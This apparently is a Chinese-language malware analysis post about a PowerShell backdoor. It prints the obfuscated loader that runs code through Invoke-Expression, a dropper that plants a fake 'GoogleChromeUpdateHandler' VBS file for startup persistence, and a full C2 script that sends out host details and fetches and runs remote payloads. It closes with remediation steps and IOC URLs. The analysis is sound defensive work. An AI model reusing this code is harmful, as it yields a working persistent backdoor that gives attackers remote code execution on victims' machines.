519168,509184,545792,292864,292864,399360,439296,439296,425984,292864,272896,445952,539136,495872,272896,306176,266240,272896,272896,296192,296192,266240,306176,266240,279552,435968,532480,519168,509184,545792,545792,495872,539136,296192,203008
,193024,266240,266240,266240,266240,542464,555776,509184,545792,489216,505856,292864,279552,376064,462592,319488,469248,296192,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,439296,432640,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,266240,362752,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,396032,549120,509184,492544,469248,352768,352768,419328,495872,555776,396032,549120,509184,492544,292864,296192,312832,439296,529152,435968,545792,539136,509184,525824,502528,292864,296192,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,309504,272896,306176,266240,272896,272896,296192,266240,302848,266240,272896,312832,425984,435968,322816,272896,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,545792,539136,509184,525824,502528,469248,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,439296,495872,559104,545792,312832,389376,525824,489216,529152,492544,509184,525824,502528,469248,352768,352768,386048,495872,499200,482560,549120,519168,545792,312832,396032,495872,545792,435968,545792,539136,509184,525824,502528,292864,372736,292864,346112,329472,306176,322816,319488,322816,306176,322816,322816,339456,306176,329472,326144,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,339456,322816,306176,329472,326144,306176,339456,342784,306176,322816,322816,332800,306176,322816,319488,322816,306176,349440,3427
84,306176,322816,322816,339456,306176,322816,319488,322816,306176,342784,349440,306176,349440,346112,306176,322816,319488,339456,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,339456,306176,332800,319488,306176,329472,332800,306176,346112,342784,306176,346112,329472,306176,349440,349440,306176,322816,322816,332800,306176,322816,319488,336128,306176,322816,322816,326144,306176,322816,322816,339456,306176,332800,339456,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,332800,306176,332800,322816,306176,322816,329472,306176,322816,319488,306176,346112,342784,306176,322816,322816,336128,306176,322816,319488,332800,306176,346112,329472,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,332800,339456,306176,346112,326144,306176,322816,322816,342784,306176,322816,322816,319488,306176,329472,326144,306176,329472,332800,306176,346112,319488,306176,322816,322816,322816,306176,322816,322816,349440,306176,322816,319488,322816,306176,322816,322816,332800,306176,322816,322816,336128,306176,322816,319488,332800,306176,322816,319488,322816,306176,322816,319488,346112,306176,322816,319488,346112,306176,329472,326144,306176,332800,336128,306176,339456,349440,306176,322816,326144,319488,306176,322816,319488,322816,306176,349440,349440,306176,322816,322816,342784,306176,322816,322816,339456,306176,322816,319488,336128,306176,322816,322816,322816,306176,322816,322816,319488,306176,346112,319488,306176,322816,322816,322816,306176,322816,319488,346112,306176,322816,319488,336128,306176,349440,349440,306176,322816,326144,322816,306176,329472,326144,306176,339456,339456,306176,322816,326144,322816,306176,322816,322816,326144,306176,349440,342784,306176,322816,322816,336128,306176,322816,322816,336128,306176,329472,326144,306176,332800,336128,306176,342784,319488,306176,322816,319488,336128,306176,322816,31
9488,346112,306176,322816,319488,322816,306176,329472,326144,306176,329472,332800,306176,329472,326144,306176,332800,329472,306176,329472,326144,306176,329472,332800,306176,329472,342784,306176,346112,319488,306176,346112,332800,306176,329472,342784,306176,329472,332800,306176,332800,332800,306176,329472,326144,306176,332800,346112,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,266240,362752,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,425984,482560,545792,505856,469248,352768,352768,396032,495872,545792,439296,495872,522496,532480,425984,482560,545792,505856,292864,296192,266240,302848,266240,279552,425984,542464,392704,509184,519168,495872,419328,482560,522496,495872,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,306176,266240,279552,376064,462592,322816,469248,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,435968,562432,542464,545792,495872,522496,312832,402688,422656,312832,392704,509184,519168,495872,469248,352768,352768,449280,539136,509184,545792,495872,376064,519168,519168,439296,495872,559104,545792,292864,462592,435968,562432,542464,545792,495872,522496,312832,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,396032,495872,545792,392704,529152,519168,492544,495872,539136,425984,482560,545792,505856,292864,342784,296192,266240,302848,266240,272896,465920,449280,509184,525824,412672,422656,396032,422656,419328,442624,532480,492544,
482560,545792,495872,312832,552448,485888,542464,272896,306176,266240,279552,435968,545792,482560,539136,545792,549120,532480,382720,529152,525824,545792,495872,525824,545792,312832,432640,495872,532480,519168,482560,489216,495872,292864,272896,282880,425984,439296,282880,272896,306176,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,296192,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,425984,529152,555776,495872,539136,435968,505856,495872,519168,519168,312832,495872,559104,495872,266240,309504,449280,509184,525824,492544,529152,555776,435968,545792,562432,519168,495872,266240,399360,509184,492544,492544,495872,525824,266240,309504,389376,559104,495872,489216,549120,545792,509184,529152,525824,425984,529152,519168,509184,489216,562432,266240,432640,495872,522496,529152,545792,495872,435968,509184,502528,525824,495872,492544,266240,309504,392704,509184,519168,495872,266240,279552,439296,482560,539136,502528,495872,545792,425984,482560,545792,505856,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,289536,382720,519168,289536,266240,569088,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,266240,266240,266240,266240,266240,266240,266240,266240,485888,539136,495872,482560,515840,266240,575744,203008,193024,189696,203008,193024,189696,289536,442624,525824,289536,266240,569088,203008,193024,189696,266240,266240,266240,266240,462592,389376,525824,552448,509184,539136,529152,525824,522496,495872,525824,545792,469248,352768,352768,389376,559104,509184,545792,292864,319488,296192,203008,193024,189696,485888,539136,49587
2,482560,515840,266240,575744,203008,193024,266240,266240,266240,266240,575744,203008,193024,266240,266240,266240,266240,435968,545792,482560,539136,545792,309504,435968,519168,495872,495872,532480,266240,309504,416000,509184,519168,519168,509184,542464,495872,489216,529152,525824,492544,542464,266240,329472,319488,319488,319488,203008,193024,575744)
    [String] $PDF = [System.Text.UTF8Encoding]::UTF8.GetString((IntegerToBytes $rawData '00125495565210225012546982'))
    Invoke-Expression $PDF
    

    自啟動

    第二層轉譯

    # Stage two, as recovered after decoding. Two assemblies are loaded up front; neither is referenced
    # within this stage itself, but Microsoft.VisualBasic is used by the later C2 script (Interaction / Strings).
    Add-Type -AssemblyName System.Windows.Forms
    Add-Type -AssemblyName Microsoft.VisualBasic
    # Persistence: drops a VBScript launcher into the current user's Startup folder so this script is
    # re-run at every logon. The only action taken by this stage is calling this function.
    function DropToStartup() {
        # The byte array is plain ASCII for the launcher text (decoded form is listed further down the page):
        #   Set OBB = CreateObject("WScript.Shell")
        #   OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"%FILE%",0
        # Storing it as numbers rather than a string literal presumably keeps "WScript.Shell" / "PowerShell"
        # out of plain-text string matches on the script body.
        [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
        # SpecialFolder value 7 is the per-user Startup folder; %FILE% is replaced with $PSCommandPath, i.e. the
        # path of this very script, so the launcher points back at the stage currently executing.
        # Detection: powershell.exe creating a *.vbs under ...\Start Menu\Programs\Startup (path recorded below on the page).
        [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandlerx64.vbs', $startup.Replace('%FILE%', $PSCommandPath))
    }
    DropToStartup
    

    將代碼

    ' Decoded content of the dropped launcher (GoogleChromeUpdateHandlerx64.vbs in the Startup folder).
    ' The %FILE% placeholder has already been substituted here with the analyst's own sample path; on an
    ' infected host it holds wherever the stage-two script was written.
    Set OBB = CreateObject("WScript.Shell")
    ' Window style 0 = hidden. RemoteSigned does not restrict locally created, unsigned scripts, so the
    ' dropped file runs at each logon without any signing requirement.
    OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"C:\Users\Administrator\Desktop\worm_server.ps1",0
    

    寫入路徑

    C:\Users\Hk_Mayfly\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChromeUpdateHandlerx64.vbs,即設置為自啟動

    C2控制腳本

    # C2 control script: global configuration. How this stage is delivered is not shown on the page
    # (it may be the stage pulled via 'TR' or a further decoded layer) — treat the origin as unconfirmed.
    Add-Type -AssemblyName System.Windows.Forms
    Add-Type -AssemblyName Microsoft.VisualBasic
    # COM HTTP client (MSXML2.XMLHTTP) created via VisualBasic's Interaction.CreateObject; reused by HTTP() below.
    [Object] $HTTP_OBJECT = [Microsoft.VisualBasic.Interaction]::CreateObject('MSXML2.XMLHTTP')
    # Hard-coded C2 endpoint; matches the http://185.81.157.136:3681/Vre entry in the IOC list.
    [String] $IP = '185.81.157.136'
    [String] $Port = '3681'
    # Delimiter between command and payload in C2 responses ("<cmd>|V|<payload>").
    [String] $Splitter = '|V|'
    # Suppress all non-terminating errors so the beacon loop keeps running regardless of failures.
    $ErrorActionPreference = 'SilentlyContinue'
    # Persistence, same mechanism as the stage-two variant: writes a VBScript launcher that runs
    # "PowerShell -ExecutionPolicy RemoteSigned -File <this script>" hidden at logon.
    function DropToStartup() {
        # ASCII bytes of the launcher template; %FILE% is the placeholder for the script path.
        [String] $startup = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,79,66,66,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,79,66,66,46,82,117,110,32,34,80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,34,43,34,37,70,73,76,69,37,34,44,48))
        # NOTE: the file name here is GoogleChromeUpdateHandler.vbs (no "x64" suffix), unlike the stage-two
        # dropper's GoogleChromeUpdateHandlerx64.vbs — both names belong on the cleanup list.
        [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + '\GoogleChromeUpdateHandler.vbs', $startup.Replace('%FILE%', $PSCommandPath))
    }
    # POSTs $Param to http://<IP>:<Port>/<$DA> (synchronous) and returns the response body as a string.
    # Any failure is swallowed by the empty catch and an empty string is returned, so callers cannot
    # distinguish "no command" from "C2 unreachable".
    Function HTTP($DA, $Param) {
        [String] $Response = [String]::Empty
        try
        {
            $HTTP_OBJECT.Open('POST', 'http://' + $IP + ':' + $Port + '/' + $DA, $false)
            # The host fingerprint built by INF (script-scope $INFO, assigned after the function definitions)
            # is exfiltrated in the User-Agent header; note the stray ':' in the header name. The captured
            # request shown on the page has it under User-Agent, so MSXML appears to send it anyway.
            # Detection: beaconing POSTs whose User-Agent starts with "Novo_" and is backslash-delimited.
            $HTTP_OBJECT.SetRequestHeader('User-Agent:', $INFO)
            $HTTP_OBJECT.Send($Param)
            $Response = [Convert]::ToString($HTTP_OBJECT.ResponseText)
        } catch { }
        return $Response
    }
    # Builds the victim fingerprint sent in every beacon (see the example User-Agent further down the page).
    # Format: Novo_<hwid>\<computer>\<user>\<OS name> <arch>\Windows Defender\Yes\Yes\FALSE\
    Function INF {
        [String] $MAC = HWID($env:computername)
        [String] $ID = 'Novo_' + $MAC
        # Assigned but never included in the returned string.
        [String] $VER = 'v0.2'
        # OS caption (first '|' field of Win32_OperatingSystem.Name) plus architecture, e.g. "64 位".
        [String] $OS = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,"|")[0] + " " + (Get-WmiObject Win32_OperatingSystem).OSArchitecture
        # The AV field is a hard-coded constant, not the result of any query.
        [String] $AV = 'Windows Defender'
        # The trailing Yes/Yes/FALSE fields are likewise fixed literals; their meaning is not determinable from this script.
        return $ID + "\" + ($env:COMPUTERNAME) + "\" + ($env:UserName) + "\" + $OS + "\" + $AV + "\" + "Yes" + "\" + "Yes" + "\" + "FALSE" + "\"
    }
    # Machine identifier: the first two '-'-separated segments of the Win32_ComputerSystemProduct UUID.
    # The $strComputer parameter is accepted but never used; the query always targets the local host.
    # If the WMI call fails (errors are silenced) $lol is empty and indexing the split result yields nothing,
    # which would explain the empty id in the "Novo_\..." example captured on this page — unconfirmed.
    Function HWID($strComputer) {
        $ErrorActionPreference = 'SilentlyContinue'
        $lol = [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID))
        return ([Microsoft.VisualBasic.Strings]::Split($lol,'-')[0] + [Microsoft.VisualBasic.Strings]::Split($lol,'-')[1])
    }
    # Entry sequence: install persistence, compute the fingerprint once, then beacon forever.
    DropToStartup
    [String] $INFO = INF
    while($true)
    {
        # Poll the C2 at /Vre with an empty body; the reply is "<cmd>|V|<payload>".
        $A = [Microsoft.VisualBasic.Strings]::Split((HTTP("Vre", "")) , $Splitter)
        switch($A[0]) {
            # 'TR': the payload ($A[1]) is a PowerShell script. It is written to %TEMP%\<guid>.PS1, a second
            # launcher (WinLOGONUpdate.vbs, decoded on the page as WshShell.Run "Powershell -ExecutionPolicy
            # Bypass -File " + "%PT%", 0) is dropped into the Startup folder so the payload also survives
            # reboot, and the payload is executed immediately with a hidden window.
            # Detection: powershell.exe writing *.PS1 into %TEMP% followed by a child powershell.exe -File <that path>.
            'TR' {
                [String] $PsFileName =  [System.Guid]::NewGuid().ToString().Replace("-", "") + ".PS1"
                [String] $StartupContent = [System.Text.Encoding]::Default.GetString(@(83,101,116,32,87,115,104,83,104,101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,41,13,10,87,115,104,83,104,101,108,108,46,82,117,110,32,34,80,111,119,101,114,115,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,70,105,108,101,32,34,32,43,32,34,37,80,84,37,34,44,32,48))
                $TargetPath = [System.IO.Path]::GetTempPath() + $PsFileName
                [System.IO.File]::WriteAllText($TargetPath, $A[1])
                [System.IO.File]::WriteAllText([System.Environment]::GetFolderPath(7) + "\WinLOGONUpdate.vbs", $StartupContent.Replace("%PT%", $TargetPath))
                PowerShell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File $TargetPath
            break }
            # 'Cl' and 'Un' are identical: exit the current process only. Neither removes the Startup
            # launchers or the dropped .PS1, so "uninstall" leaves persistence in place — responders must
            # delete those files by hand (see the remediation list below).
            'Cl' {
                [Environment]::Exit(0)
            break }
        'Un' {
            [Environment]::Exit(0)
        break }
        }
        # Beacon interval: 3 seconds.
        Start-Sleep -Milliseconds 3000
    }
    

    每3秒向服務器http://185.81.157.136:3681/Vre發起請求,并會將感染機信息放入User-Agent字段,以POST請求發送到服務器。類似:

    {User-Agent:Novo_\DESKTOP-KQH6LSB\Hk_Mayfly\Microsoft Windows 10 專業版 64 位\Windows Defender\Yes\Yes\FALSE\} 同時,遠程服務器返回信息控制感染機:

    指令代碼 | 含義
    TR | 下載遠程惡意代碼執行
    Cl | 終止惡意進程
    Un | 終止惡意進程

    執行TR命令時: 

    1. 會將遠程惡意文件下載到臨時目錄,例如 C:\Users\Hk_Mayfly\AppData\Local\Temp\4af4ccd7024e4982ae61202d8926e0bf.PS1
    2. 將惡意文件路徑寫入到 C:\Users\Hk_Mayfly\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinLOGONUpdate.vbs,設為自啟動
    3. 執行命令 WshShell.Run "Powershell -ExecutionPolicy Bypass -File " + "C:\Users\Hk_Mayfly\AppData\Local\Temp\4af4ccd7024e4982ae61202d8926e0bf.PS1", 0 啟動惡意文件。樣本行為有點類似紫狐病毒了~

    總結

    修復建議:

    1. 清除臨時目錄下的 {hash}.PS1 文件
    2. 清除自啟動目錄下的 WinLOGONUpdate.vbs 和 GoogleChromeUpdateHandlerx64.vbs 文件(C2 控制腳本中的 DropToStartup 寫入的文件名為 GoogleChromeUpdateHandler.vbs,不帶 x64 後綴,亦需一併清除)

    IOC信息:

    6b9b98ab790280f0ae64ac2b30ee8220
    http://2.56.57.82/1/1.txt
    http://2.56.57.82/1/SystemLogin.txt
    http://2.56.57.82/1/Win10.txt
    http://185.81.157.136:3681/Vre
    其它
    http://blackid-42311.portmap.host:7974/Vre
    http://janda.publicvm.com:1005/Vre
    http://severdops.ddns.net:5050/Vre
    

    C段中還發現了其他惡意URL:

    http://2.56.57.181/ordine_STAR_PROGETTI_Uupepfct.jpg
    http://2.56.57.187/moo/m00r4i.arm
    http://2.56.57.187/moo/m00r4i.arm5
    http://2.56.57.187/moo/m00r4i.arm6
    http://2.56.57.187/moo/m00r4i.arm7
    http://2.56.57.187/moo/m00r4i.m68k
    http://2.56.57.187/moo/m00r4i.mips
    http://2.56.57.187/moo/m00r4i.mpsl
    http://2.56.57.187/moo/m00r4i.ppc
    http://2.56.57.187/moo/m00r4i.sh4
    http://2.56.57.187/moo/m00r4i.spc
    http://2.56.57.187/moo/m00r4i.x86
    http://2.56.57.49/LjEZs/uYtea.arm
    http://2.56.57.49/LjEZs/uYtea.arm5
    http://2.56.57.49/LjEZs/uYtea.arm6
    http://2.56.57.49/LjEZs/uYtea.m68k
    http://2.56.57.49/LjEZs/uYtea.mpsl
    http://2.56.57.49/LjEZs/uYtea.ppc
    http://2.56.57.49/LjEZs/uYtea.spc
    http://2.56.57.49/LjEZs/uYtea.x86
    http://2.56.57.49/LjEZs/uYtea.x86_64
    http://2.56.57.49/arm5
    http://2.56.57.49/arm6
    http://2.56.57.49/arm7
    http://2.56.57.49/m68k
    http://2.56.57.49/mips
    http://2.56.57.49/mpsl
    http://2.56.57.49/x86
    http://2.56.57.98/arm
    http://2.56.57.98/hahahaha.sh
    http://2.56.57.98/i686
    http://2.56.57.98/mipsel
    http://2.56.57.98/sh4
    http://2.56.57.98/sparc
    


    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接